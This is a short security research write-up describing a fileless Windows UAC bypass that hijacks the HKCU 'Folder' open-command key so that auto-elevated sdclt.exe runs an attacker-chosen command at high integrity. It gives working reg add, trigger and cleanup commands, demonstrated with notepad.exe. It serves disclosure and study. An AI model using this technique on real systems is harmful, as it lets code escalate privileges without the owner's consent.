Yet another sdclt UAC bypass

License : Copyright Emeric Nasi, some rights reserved
This work is licensed under a Creative Commons Attribution 4.0 International License.

1. Origin of the bypass

As often with UAC, the flaw comes from an auto-elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window. If the user running with medium privileges can make these process load a dll or execute a command, UAC bypass is performed.

In our case, the executable is sdclt.exe. Sdclt is used in the context of Windows backup and restore mechanisms. You can check it auto-elevates using Sysinternals Sigcheck:

The method I found is fileless and is based on COM hijacking.
Some interesting events which occur when sdclt.exe is called from a medium integrity process:

• It runs another process of sdclt.exe with high privilege
• The high privilege sdclt process calls C:\Windows\System32\control.exe
• Control.exe process runs with high privilege and ....

Using Sysinternals Procmon, we can see that control.exe is failing to find an open command for the "folder" object in the current user registry (HKCU).

This is very good sign for someone looking to bypass UAC! That is because UAC privileges are not required to write in there so we can basically make an elevated process run a command even if we are in the context of medium integrity process.

2. Exploit the bypass

You can easily test this UAC bypass with a few command lines.
Setup the registry:
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

Trigger the bypass:
%windir%\system32\sdclt.exe

You can watch notepad.exe pop with high integrity level.

After that, do not forget to clean the registry with:
reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f